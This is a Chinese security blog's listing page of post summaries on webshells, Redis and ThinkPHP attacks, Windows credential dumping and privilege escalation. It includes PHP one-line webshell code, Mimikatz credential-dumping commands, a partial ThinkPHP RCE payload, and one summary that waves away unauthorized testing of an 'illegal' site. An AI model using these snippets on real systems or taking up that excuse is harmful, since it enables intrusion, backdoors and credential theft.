摘要: 0X00普通的一句话木马(适用于CTF和小站) <?php eval($_POST['a']); ?> //函数的相似替换 <?php assert($_POST['a']); ?> <?php @eval($_POST['110']);?>与第一个一句话木马相比多了一个"@"字符,我们发现这个字符 阅读全文
posted @ 2022-09-29 08:03 0DayBug 阅读(613) 评论(0) 推荐(1) 编辑
摘要: 0 前言 公司的每月任务同事没完成数量就帮忙看了一下,发现到了个查不到的问题就来分享了一下。 1、渗透路程 首先从资产列表中随便选了一个站:http://www.xxxxx.org.cn 。然后就习惯性的先点击插件link-grabber看看网页有包含了什么链接 这路径一看直接猜测一波帝国cms好吧 阅读全文
posted @ 2022-05-22 09:30 0DayBug 阅读(209) 评论(0) 推荐(0) 编辑
摘要: 前言 本篇文章分享一下通用漏洞挖掘的过程,想要获得通用漏洞证书,首先要求是中危及中危以上的通用型漏洞且所属公司的注册资本大于5000万。挖掘一个漏洞其实不难,个人觉得是目标公司资产的搜集。访问CNVD平台发现某网关系统被师傅提交过任意文件读取漏洞,然后搜索目标再来挖掘一下说不定能捡个漏。 未授权访问 阅读全文
posted @ 2022-05-11 07:08 0DayBug 阅读(148) 评论(0) 推荐(0) 编辑
摘要: Redis是目前最热门的非关系型数据库,在各大公司被大量应用且存在未授权访问以及弱口令漏洞,是我们在红队攻防领域值得研究的数据库之一。 0x01 Redis简介 Redis(Remote Dictionary Server)是一个由 Salvatore Sanfillppo 写的 key-value 阅读全文
posted @ 2022-04-23 11:03 0DayBug 阅读(174) 评论(0) 推荐(0) 编辑
摘要: 关于Auto-Elevate Auto-Elevate是一款功能强大的Windows系统安全测试工具,该工具可以在不需要离邕任何LPE漏洞的 情况下,通过结合COM UAC绕过技术和令牌伪造技术,帮助广大研究人员将低完整性的管理员账号提升至NT AUTHORITY\SYSTEM。 该工具能够实现UA 阅读全文
posted @ 2022-04-19 21:21 0DayBug 阅读(142) 评论(0) 推荐(0) 编辑
摘要: 前言 获取Windows用户的凭证信息是渗透过程中至关重要的一步。 没杀软,只要有权限想怎么读就怎么读。 有杀软,得用一些特别的技巧。 注:本机所有测试均为物理机,且为最新版AV Mimikatz直接读取Lsass进程 权限提升 privilege::debug 抓取密码 sekurlsa::log 阅读全文
posted @ 2022-04-19 09:38 0DayBug 阅读(420) 评论(0) 推荐(0) 编辑
摘要: 环境 Thinkphp6.0.12LTS(目前最新版本); PHP7.3.4。 安装 composer create-project topthink/think tp6 测试代码 漏洞分析 漏洞起点不是__desturct就是__wakeup全局搜索下,起点在vendor\topthink\thi 阅读全文
posted @ 2022-04-16 08:35 0DayBug 阅读(1508) 评论(0) 推荐(1) 编辑
摘要: DolphinPHP DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一 阅读全文
posted @ 2022-04-14 13:48 0DayBug 阅读(626) 评论(0) 推荐(0) 编辑
摘要: 拿下一个站后总希望自己的后门能够很隐蔽!不让网站管理员或者其他的Hacker发现,网上关于隐藏后门的方法也很多,如加密、包含,解析漏洞、加隐藏系统属性等等,但大部分已经都不实用了,随便找一个查马的程序就能很快的查出来,下面分享我总结的一些经验: 制作免杀webshell 隐藏webshell最主要的 阅读全文
posted @ 2021-02-05 20:22 0DayBug 阅读(408) 评论(0) 推荐(0) 编辑
摘要: 记录一下tp5.0.24,感觉此站应该是阉割版,按理来说tp5.0.24应该没有rce的。网站是非法站点,不用担心未授权。还是先报错一手,发现是5.0.24的,当时想应该没有希望了,但是还是抱着试一试的心态,用exp打一打 _method=__construct&method=get&filter[ 阅读全文
posted @ 2021-01-28 06:42 0DayBug 阅读(2548) 评论(1) 推荐(1) 编辑